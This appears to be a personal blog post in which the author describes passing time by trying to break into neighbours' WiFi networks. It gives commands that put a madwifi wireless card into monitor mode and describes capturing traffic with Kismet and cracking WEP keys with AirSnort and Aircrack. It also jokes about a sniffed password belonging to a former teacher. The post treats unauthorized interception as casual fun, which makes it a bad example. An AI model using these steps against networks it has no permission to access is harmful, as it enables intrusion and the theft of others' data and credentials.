Well, my internet is busted. Specifically, I think the WiFi access point of the guy I sublet from is defunct. So, to wile away my internetless hours I’ve been learning how to get into my neighbors’ networks. The process is pretty simple. A little bit of terminology first:
If you are familiar with wired ethernet sniffing, you know the term promiscuous mode. An ethernet is like a room full of people all shouting at the same time and your computer just ignores anything not specifically destined for it. When you go into promiscuous mode you start listening to anything happening on the line. If people are sending passwords and whatnot without using encryption, you can just read them out of the traffic. (So I’ve heard. I’d certainly not know if any of my English teachers back in college had the password “60retire”.)
Well, a wireless network has the concept of promiscuous mode as well. It isn’t what you want though. Promiscuous mode will give you information about all the computers connected to the network with the access point that you are using. What is interesting in this situation is all the computers that are broadcasting, but which aren’t on your network. To get those packets, you need to go into monitor mode.
The 802.11 protocol allows for sending out probe requests to which an access point in broadcast mode will respond. Netstumber uses this method to detect networks. This is mostly useful in wardriving when you’re not going to be around long enough for an actual broadcast. Since I’m sitting in one place, I don’t really need that. Another advantage is that some access points aren’t in broadcast mode and a wireless card in monitor mode will detect those as well.
My card is a 3com 3CRDAG675 and I’m using the madwifi drivers since support isn’t built into the kernel. The drivers aren’t supported by most of the sniffing programs, but all I have to do is put the card in monitor mode manually. (This took me a while to figure out, so I’ll note it here. Assuming that the card is already up and running, do:)
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode mon
ifconfig ath0 up
Then I start up Kismet and leave it running. Unfortunately, none of my neighbors seem to be BitTorrent fans, so traffic has been coming in pretty slow. According to an excellent article on WEP cracking, I’m going to need about 2gb of traffic. At my current rate, I ought to have that in about three months.
Because the analysis being done is statistical, different tools have different rates of success. Kismet dumps all it’s logs in
/var/log/kismet and I’m running AirSnort and Aircrack. From reading a comparison of WEP crackers however, it really looks like WEPLab is the way to go.